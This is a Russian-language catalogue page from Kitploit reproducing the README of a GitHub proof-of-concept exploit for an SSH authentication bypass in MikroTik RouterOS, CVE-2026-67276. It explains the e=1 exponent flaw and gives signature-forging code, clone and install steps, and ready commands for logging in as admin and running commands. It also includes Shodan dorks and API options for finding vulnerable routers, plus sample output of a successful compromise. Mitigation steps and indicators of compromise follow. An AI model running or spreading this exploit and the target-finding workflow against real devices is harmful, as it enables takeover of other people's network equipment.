Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
exploit-mikrotik-2026 — CVE-2026-67276 Эксплойт обхода аутентификации SSH в MikroTik RouterOS | Kitploit
Инструменты/GitHubGitHub/blackhatexploitation/exploit-mikrotik-2026
РазведкаАнализ уязвимостейЭксплуатацияСбор информацииСетевая безопасностьТестирование на ПроникновениеАутентификация
GitHubblackhatexploitation/exploit-mikrotik-2026

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

exploit-mikrotik-2026

CVE-2026-67276 Эксплойт обхода аутентификации SSH в MikroTik RouterOS

Репозиторий
8 ч 16 мин назадЕщё не проверено

CVE-2026-67276 - Эксплойт обхода аутентификации SSH MikroTrik

CVE Severity Type Platform

Обход аутентификации по открытому ключу SSH в MikroTik RouterOS — закрытый ключ не требуется

Доказательство концепции эксплуатации CVE-2026-67276 (MikroTrick) — критической уязвимости обхода аутентификации в реализации SSH в MikroTik RouterOS, которая позволяет злоумышленникам аутентифицироваться под любым пользователем без наличия его закрытого ключа.


Содержание

  • Обзор уязвимости
  • Как это работает
  • Затронутые версии
  • Установка
  • Использование
  • Разведка через Shodan
  • Технические детали
  • Устранение
  • Ссылки
  • Отказ от ответственности

Обзор уязвимости

Цепочка атак MikroTrick

CVE-2026-67276 является частью более крупной цепочки атак, названной «MikroTrick» командой CERT PL, которая, как было замечено, активно эксплуатируется в дикой природе:


Как это работает

Уязвимость

В аутентификации SSH RouterOS есть критический недостаток в том, как проверяются открытые ключи:

  1. Ошибка сопоставления ключей: RouterOS сопоставляет представленный блоб открытого ключа SSH с авторизованными ключами, используя только (тип ключа, модуль), полностью пропуская экспоненту
  2. Экспонента от клиента: Проверка подписи использует экспоненту из блоб-данных, предоставленных клиентом, а не из сохранённого ключа
  3. Тривиальная подделка: Представление {ssh-rsa, e=1, n=модуль_жертвы} делает проверку тривиальной

Математическая основа

root@kitploit:~
Стандартная проверка RSA:  sig^65537 mod n == ожидаемое  (требуется закрытый ключ)
Эксплуатируемая проверка:  sig^1 mod n == sig            (закрытый ключ НЕ нужен!)

При экспоненте e=1 проверка подписи становится:

root@kitploit:~
sig^1 mod n == sig

Это означает, что «подпись» — это просто само сообщение, закодированное по EMSA-PKCS1-v1_5 — которое может создать любой, кто знает открытый модуль жертвы.

Предварительные условия атаки

  1. Имя целевого пользователя учётной записи с авторизованным ключом RSA
  2. Открытый модуль RSA n этого авторизованного ключа (из файла .pub, предыдущих подключений и т. д.)
  3. Сетевой доступ к порту SSH

Затронутые версии

ВеткаУязвимый диапазонИсправленная версия
6.x6.0 - 6.49.206.49.21+

Установка

root@kitploit:~
# Клонирование репозитория
git clone https://github.com/BlackHatExploitation/exploit-mikrotik-2026.git
cd exploit-mikrotik-2026

# Установка зависимостей
pip install paramiko cryptography

Использование

Быстрый старт

root@kitploit:~
# Базовый эксплойт — автоматическая генерация ключа, определение версии
python3 full_exploit.py --host 192.168.88.1 --username admin

# Выполнение команды после аутентификации
python3 full_exploit.py --host 192.168.88.1 --username admin --exec '/system resource print'

# Нестандартный порт
python3 full_exploit.py --host 192.168.88.1 --port 2222 --username admin

Использование существующего открытого ключа

root@kitploit:~
# Если у вас есть файл открытого ключа жертвы
python3 full_exploit.py --host 192.168.88.1 --username admin --pubkey victim.pub

# Или укажите модуль напрямую
python3 full_exploit.py --host 192.168.88.1 --username admin --modulus-hex "00:ab:cd:..."

Определение версии

Эксплойт автоматически определяет версию RouterOS и проверяет статус уязвимости:

root@kitploit:~
# Принудительное выполнение эксплойта даже на не-MikroTik или неизвестной версии
python3 full_exploit.py --host 192.168.88.1 --username admin --skip-version-check

Все параметры

root@kitploit:~
--host              IP-адрес/имя хоста целевого RouterOS (обязательно)
--port              Порт SSH (по умолчанию: 22)
--username          Имя пользователя целевого RouterOS (обязательно)
--pubkey            Файл открытого ключа RSA (автоматически генерируется, если не указан)
--modulus-hex       Модуль RSA в hex (альтернатива --pubkey)
--algos             Алгоритмы подписи (по умолчанию: ssh-rsa,rsa-sha2-256)
--exec              Команда для выполнения после аутентификации
--exp-enc           Кодировка экспоненты: каноническая (1 байт) или выровненная (3 байта)
--timeout           Таймаут соединения (по умолчанию: 15.0 секунд)
--skip-version-check    Пропустить проверку версии RouterOS
--shodan-dorks      Вывести поисковые запросы Shodan
--shodan-search     Поиск целей через API Shodan
--shodan-key        Ключ API Shodan
--shodan-query      Пользовательский запрос Shodan
--shodan-limit      Лимит результатов Shodan (по умолчанию: 100)

Разведка через Shodan

Вывод поисковых запросов

root@kitploit:~
python3 full_exploit.py --shodan-dorks

Поиск через API Shodan

root@kitploit:~
# Базовый поиск
python3 full_exploit.py --shodan-search --shodan-key YOUR_API_KEY

# Пользовательский запрос
python3 full_exploit.py --shodan-search --shodan-key YOUR_KEY --shodan-query 'MikroTik port:22 country:US'

Полезные запросы Shodan


Технические детали

Структура блоба открытого ключа SSH

root@kitploit:~
string    "ssh-rsa"
mpint     e (открытая экспонента)  <- Злоумышленник указывает e=1
mpint     n (модуль)               <- Фактический модуль жертвы

Генерация поддельной подписи

root@kitploit:~
# «Подпись» — это просто данные аутентификации, закодированные по EMSA-PKCS1-v1_5
def forged_signature(data, sig_alg, n):
    k = (n.bit_length() + 7) // 8
    block = emsa_pkcs1_v15(data, sig_alg, k)
    return block  # Это И ЕСТЬ действительная подпись при e=1

Примечания к формату передачи

  • Внутренняя строка типа блоба остаётся ssh-rsa даже для алгоритмов rsa-sha2-256/512
  • Алгоритм подписи указывается только во внешнем поле алгоритма
  • Как каноническая (1 байт), так и выровненная (3 байта) кодировки e=1 работают на уязвимых версиях

Пример вывода

root@kitploit:~
[*] CVE-2026-67276 MikroTrick Exploit
[*] Цель: 192.168.88.1:22

[*] Определение версии RouterOS...
[*] SSH-баннер: SSH-2.0-ROSSSH-7.23.3
[*] Версия RouterOS: 7.23.3
[+] ВЕРСИЯ УЯЗВИМА — применим CVE-2026-67276

[*] Генерация пары ключей RSA 2048 бит...
[+] Закрытый ключ сохранён: /path/to/exploit_key
[+] Открытый ключ сохранён:  /path/to/exploit_key.pub
[*] Модуль: 2048 бит | поддельная e=1
[*] Кодировка экспоненты: каноническая (01)

[*] Попытка rsa-sha2-256 ...
[+] АУТЕНТИФИЦИРОВАН как 'admin' через rsa-sha2-256
[+] CVE-2026-67276 ПОДТВЕРЖДЁН — цель уязвима
--- вывод команды ---
                uptime: 14d23h45m12s
               version: 7.23.3 (stable)
            build-time: Sep/01/2026 12:00:00

Устранение

1. Немедленное обновление

root@kitploit:~
# Проверка текущей версии
/system resource print

# Обновление до исправленной версии
/system package update download
/system reboot

Минимальные безопасные версии:

  • Ветка 6.x: 6.49.21
  • 7.x stable: 7.23.4
  • 7.x testing: 7.24.2

2. Отключение SSH, если он не требуется

root@kitploit:~
/ip service disable ssh

3. Ограничение доступа к SSH

root@kitploit:~
# По IP-адресу
/ip service set ssh address=192.168.88.0/24

# Правило брандмауэра
/ip firewall filter add chain=input dst-port=22 protocol=tcp \
    src-address=!192.168.88.0/24 action=drop

4. Проверка на компрометацию

root@kitploit:~
# Проверка подозрительных пользователей
/user print

# Проверка пользователя "ops" (известный индикатор атаки)
/user print where name=ops

# Проверка статуса флага устройства
/system/device-mode/print

# Проверка журналов
/log print where topics~"ssh"

Известные IOC:

  • Записи журнала: login failure for user -2 via ssh
  • Неизвестный привилегированный пользователь ops
  • Маркер «Flagged» на устройстве
  • IP-адреса злоумышленников: 82.192.72.4, 103.102.31.18

Ссылки

  • Консультация CERT PL
  • Детали CVE от CERT PL
  • Бюллетень безопасности MikroTik
  • RFC 8017 - PKCS#1 v2.2
  • RFC 8332 - Использование ключей RSA с SHA-256/512 в SSH
  • RFC 4252 - Протокол аутентификации SSH

Отказ от ответственности

⚠️ Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей.

  • Используйте только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение
  • Несанкционированный доступ к компьютерным системам незаконен согласно CFAA, Computer Misuse Act и аналогичным законам по всему миру
  • Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом
  • Используя этот инструмент, вы соглашаетесь использовать его ответственно и законно

Лицензия

Лицензия MIT — см. LICENSE для подробностей.


Автор

PoC для исследования безопасности — лабораторная реализация CVE-2026-67276

Поставьте звезду этому репозиторию, если он оказался полезным!

Скачать инструмент
ДетальИнформация
ID CVECVE-2026-67276
КритичностьКритическая (CVSS 9.8)
CWECWE-347 (Некорректная проверка криптографической подписи)
Вектор атакиСеть
АутентификацияНе требуется
СложностьНизкая
ВоздействиеПолная компрометация устройства
CVEТипОписание
CVE-2026-67276Обход аутентификацииОбход аутентификации по открытому ключу SSH через подделку экспоненты
CVE-2026-86060Повышение привилегийВнедрение аргументов через имя пользователя
CVE-2026-67279Обход аутентификацииSSH-соединение без завершённой userauth
CVE-2026-67277Раскрытие информацииУтечка памяти ядра через bandwidth-test
CVE-2026-67278Обход подписиПринятие некорректной подписи X.509
CVE-2026-67281Чтение файловЧтение корневых файлов WebFig через jsproxy
7.x stable
7.0 - 7.23.3
7.23.4+
7.x testing7.24.0 - 7.24.17.24.2+
ЦельЗапрос
Все MikroTikMikroTik
MikroTik SSHMikroTik port:22
Открытый Winboxport:8291
Панель WebFighttp.title:RouterOS
RouterOS 6.49.xMikroTik "6.49"
RouterOS 7.xMikroTik "RouterOS v7"
По странеMikroTik country:US
Признак уязвимостиMikroTik ("6.49" OR "7.23" OR "7.24.0")